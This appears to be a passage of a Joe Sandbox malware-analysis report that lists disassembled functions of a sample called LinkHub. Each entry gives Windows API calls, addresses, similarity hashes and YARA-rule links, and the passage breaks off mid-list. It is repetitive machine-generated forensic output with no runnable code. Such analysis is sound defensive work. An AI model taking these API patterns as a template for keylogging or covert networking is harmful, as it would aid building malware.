                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit
                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                        • API String ID: 2610073882-625585964
                                                                                        • Opcode ID: ae366eb6d097769625dc3c528c250e0db003cca4ae6947942603baf31a93f723
                                                                                        • Instruction ID: 16292b767f879a66f8874e1247fac1031cfdd62cf2f9636e60616dd028b9f9ab
                                                                                        • Opcode Fuzzy Hash: ae366eb6d097769625dc3c528c250e0db003cca4ae6947942603baf31a93f723
                                                                                        • Instruction Fuzzy Hash: C591D234A21625AFDF20DFA4CC48FAEBBB8EF45314F148559F409AB280D7709955CFA0
                                                                                        Function 002843A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 002843C8
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 002844D7
                                                                                        • _wcslen.LIBCMT ref: 002844E7
                                                                                        • VariantClear.OLEAUT32(?), ref: 0028467C
                                                                                          • Part of subcall function 0027169E: VariantInit.OLEAUT32(00000000), ref: 002716DE
                                                                                          • Part of subcall function 0027169E: VariantCopy.OLEAUT32(?,?), ref: 002716E7
                                                                                          • Part of subcall function 0027169E: VariantClear.OLEAUT32(?), ref: 002716F3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                        • API String ID: 4137639002-1221869570
                                                                                        • Opcode ID: 506dc9975b087a9b0fe5601b8686ed9b29d3d7fd9c1e7a02cb37590b2471e866
                                                                                        • Instruction ID: ef6f97d50a21aa39dbd574f9aed0f3006e3a1f3f281a5ecf00a3f2feaf6da183
                                                                                        • Opcode Fuzzy Hash: 506dc9975b087a9b0fe5601b8686ed9b29d3d7fd9c1e7a02cb37590b2471e866
                                                                                        • Instruction Fuzzy Hash: F69136786293029FC710EF24C48496AB7E5BF89714F14892DF88997392DB31ED56CF82
                                                                                        Function 0028560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 002608FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?,?,?,00260C4E), ref: 0026091B
                                                                                          • Part of subcall function 002608FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?,?), ref: 00260936
                                                                                          • Part of subcall function 002608FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?,?), ref: 00260944
                                                                                          • Part of subcall function 002608FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?), ref: 00260954
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 002856AE
                                                                                        • _wcslen.LIBCMT ref: 002857B6
                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0028582C
                                                                                        • CoTaskMemFree.OLE32(?), ref: 00285837
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                        • String ID: NULL Pointer assignment
                                                                                        • API String ID: 614568839-2785691316
                                                                                        • Opcode ID: 95ca5ebff650a8112a1b2ffa221db62c64f0a4d8c1d94072d422ae064508d88a
                                                                                        • Instruction ID: f91aa6662cfa3174e2eb977bfab10f7541040a66c43cf740d75c129eeea3f1f3
                                                                                        • Opcode Fuzzy Hash: 95ca5ebff650a8112a1b2ffa221db62c64f0a4d8c1d94072d422ae064508d88a
                                                                                        • Instruction Fuzzy Hash: 2D911975D11229EFDF11EFA4DC80AEEB7B8BF08304F10856AE915A7291DB705A64CF60
                                                                                        Function 00292B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetMenu.USER32(?), ref: 00292C1F
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00292C51
                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00292C79
                                                                                        • _wcslen.LIBCMT ref: 00292CAF
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00292CE9
                                                                                        • GetSubMenu.USER32(?,?), ref: 00292CF7
                                                                                          • Part of subcall function 00264393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002643AD
                                                                                          • Part of subcall function 00264393: GetCurrentThreadId.KERNEL32 ref: 002643B4
                                                                                          • Part of subcall function 00264393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00262F00), ref: 002643BB
                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00292D7F
                                                                                          • Part of subcall function 0026F292: Sleep.KERNEL32 ref: 0026F30A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 4196846111-0
                                                                                        • Opcode ID: c19c4e4574c279e34dee3bd2926cc89ef764c4072d17ef83774d31ef1caa5f1a
                                                                                        • Instruction ID: dc8f43547907eb9b55cbcd238aceeb5c4f08ee7680a35103ff16881d0b154707
                                                                                        • Opcode Fuzzy Hash: c19c4e4574c279e34dee3bd2926cc89ef764c4072d17ef83774d31ef1caa5f1a
                                                                                        • Instruction Fuzzy Hash: 9F71BD75A20205EFCF00EF64D885AAEB7F5EF48310F158469E816AB351DB70AD51CFA0
                                                                                        Function 0026B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 0026B8C0
                                                                                        • GetKeyboardState.USER32(?), ref: 0026B8D5
                                                                                        • SetKeyboardState.USER32(?), ref: 0026B936
                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0026B964
                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0026B983
                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 0026B9C4
                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0026B9E7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: 781ab803c2cb2bc4099137a8398966d9851568c67f9062c525ba456f96df0384
                                                                                        • Instruction ID: c17d4349738cbe8a5c97e29f7d23b91f3a33e90a88b2e5b30768b83de867c450
                                                                                        • Opcode Fuzzy Hash: 781ab803c2cb2bc4099137a8398966d9851568c67f9062c525ba456f96df0384
                                                                                        • Instruction Fuzzy Hash: E951E3A05687D63EFB374A34CC45BBABEA95F06304F088489E1D5868D2D3D8ACE4DB50
                                                                                        Function 0026B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32(00000000), ref: 0026B6E0
                                                                                        • GetKeyboardState.USER32(?), ref: 0026B6F5
                                                                                        • SetKeyboardState.USER32(?), ref: 0026B756
                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0026B782
                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0026B79F
                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0026B7DE
                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0026B7FF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: ebf7ff6aa03d8f8404e793812d4010c405e82c6abc1568c4d6a0737c0c55d944
                                                                                        • Instruction ID: 6769ea23583c3b932e66432cf7a178c5e093db7e7a01e706ab09ed715f379daf
                                                                                        • Opcode Fuzzy Hash: ebf7ff6aa03d8f8404e793812d4010c405e82c6abc1568c4d6a0737c0c55d944
                                                                                        • Instruction Fuzzy Hash: 6E51E3A19687D63DFB338B34CC55B7ABEA95B45304F0C8489E0D58A8D2D394ECE4EB50
                                                                                        Function 002357A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00235F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 002357E3
                                                                                        • __fassign.LIBCMT ref: 0023585E
                                                                                        • __fassign.LIBCMT ref: 00235879
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0023589F
                                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,00235F16,00000000,?,?,?,?,?,?,?,?,?,00235F16,?), ref: 002358BE
                                                                                        • WriteFile.KERNEL32(?,?,00000001,00235F16,00000000,?,?,?,?,?,?,?,?,?,00235F16,?), ref: 002358F7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 1324828854-0
                                                                                        • Opcode ID: 62df6618277d6925c874e6d106d86e574fc9b63f9beb55b555b0818bb69294b5
                                                                                        • Instruction ID: 22e771754e96db24979978709d694b6fc860a8e75059abcf4ce5305791b2d571
                                                                                        • Opcode Fuzzy Hash: 62df6618277d6925c874e6d106d86e574fc9b63f9beb55b555b0818bb69294b5
                                                                                        • Instruction Fuzzy Hash: 9051A5B1A10659EFCB10CFA8D845BEEBBF8EF08310F14455AE959E7291D730DA51CBA0
                                                                                        Function 00223090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002230BB
                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 002230C3
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00223151
                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0022317C
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 002231D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 1170836740-1018135373
                                                                                        • Opcode ID: 7e7763d69dfa55600fae7f84cd0c46d29aee496a32f14f94ba3c2f38833e1e00
                                                                                        • Instruction ID: 930b4516f7f42960ea7d5dca605d64ba4c807170e10904cc96397735183687d9
                                                                                        • Opcode Fuzzy Hash: 7e7763d69dfa55600fae7f84cd0c46d29aee496a32f14f94ba3c2f38833e1e00
                                                                                        • Instruction Fuzzy Hash: FB41C534A20229ABCF10DF98EC44A9EBBB5AF45324F148155E8196B392D779DB31CF90
                                                                                        Function 00281B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00283AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00283AD7
                                                                                          • Part of subcall function 00283AAB: _wcslen.LIBCMT ref: 00283AF8
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00281B6F
                                                                                        • WSAGetLastError.WSOCK32 ref: 00281B7E
                                                                                        • WSAGetLastError.WSOCK32 ref: 00281C26
                                                                                        • closesocket.WSOCK32(00000000), ref: 00281C56
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 2675159561-0
                                                                                        • Opcode ID: 828a277cba06d1cde5838ea0c16d652e55acb76f331460d66292823796764479
                                                                                        • Instruction ID: a7341826be1c1f18e6926a8eef7a09f42a492c349bfdf39829ee881957cfa9cf
                                                                                        • Opcode Fuzzy Hash: 828a277cba06d1cde5838ea0c16d652e55acb76f331460d66292823796764479
                                                                                        • Instruction Fuzzy Hash: A041F475611205AFDB10AF64D845BA9B7EDEF40324F14805AF8059B2D2D770EDA2CFE1
                                                                                        Function 0026D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0026E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0026D7CD,?), ref: 0026E714
                                                                                          • Part of subcall function 0026E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0026D7CD,?), ref: 0026E72D
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0026D7F0
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0026D82A
                                                                                        • _wcslen.LIBCMT ref: 0026D8B0
                                                                                        • _wcslen.LIBCMT ref: 0026D8C6
                                                                                        • SHFileOperationW.SHELL32(?), ref: 0026D90C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 3164238972-1173974218
                                                                                        • Opcode ID: 51589a24c2fd45087689906635a52e4c9684161f3c7bf4893a3af367b9dac70a
                                                                                        • Instruction ID: c5472903d1d28b9d03caa61887a17f4ecbce2b483496d76fad3bef29f55594b3
                                                                                        • Opcode Fuzzy Hash: 51589a24c2fd45087689906635a52e4c9684161f3c7bf4893a3af367b9dac70a
                                                                                        • Instruction Fuzzy Hash: CA416275D1521D9EDF12EFA4D985BDE73B8AF08340F1000EAA509EB142EA34ABD9CF50
                                                                                        Function 002742B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetInputState.USER32 ref: 00274310
                                                                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00274367
                                                                                        • TranslateMessage.USER32(?), ref: 00274390
                                                                                        • DispatchMessageW.USER32(?), ref: 0027439A
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002743AB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                        • String ID: (-
                                                                                        • API String ID: 2256411358-4239615555
                                                                                        • Opcode ID: 1cd2ffde7ea49d0f6de12c08816984ba8472882221673130c7bbf1c33e0f8271
                                                                                        • Instruction ID: 207816397fe6798b5f256a806d0dd1573647f17db0069f107643fe23b16e84f2
                                                                                        • Opcode Fuzzy Hash: 1cd2ffde7ea49d0f6de12c08816984ba8472882221673130c7bbf1c33e0f8271
                                                                                        • Instruction Fuzzy Hash: AB31EC70925343DFEB35EF74E84CBB637A8AB11305F2485DAD46EC21A0D3B49869DB11
                                                                                        Function 00293899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 002938B8
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 002938EB
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00293920
                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00293952
                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0029397C
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0029398D
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002939A7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 2178440468-0
                                                                                        • Opcode ID: a0c01ed18858af96959278ee83c9914cc37f8b115df9347cdf59f0a4e12b3dbf
                                                                                        • Instruction ID: 6f237a727458bb77f8998e869fe348edcfdff40472ea245284999a22345c43bd
                                                                                        • Opcode Fuzzy Hash: a0c01ed18858af96959278ee83c9914cc37f8b115df9347cdf59f0a4e12b3dbf
                                                                                        • Instruction Fuzzy Hash: 0B313230A15252AFEF21CF48EC98FA437A5FB8A710F2401A5F514CB2B2CBB0AD54DB41
                                                                                        Function 0026808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002680D0
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002680F6
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 002680F9
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00268117
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00268120
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00268145
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00268153
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: 3473c9e47a39347b01e5dee83b50364e49ef04509d73bd10b7fb80071b597e59
                                                                                        • Instruction ID: a5246acd4568d4fe6c5a936ddcb542301a1df4ed1a92cff455cf909982f29665
                                                                                        • Opcode Fuzzy Hash: 3473c9e47a39347b01e5dee83b50364e49ef04509d73bd10b7fb80071b597e59
                                                                                        • Instruction Fuzzy Hash: D921C776610219BFDF10DFA8DC88CBB73ECEB093647408525F909DB290DA70EC868761
                                                                                        Function 00268164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002681A9
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002681CF
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 002681D2
                                                                                        • SysAllocString.OLEAUT32 ref: 002681F3
                                                                                        • SysFreeString.OLEAUT32 ref: 002681FC
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00268216
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00268224
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
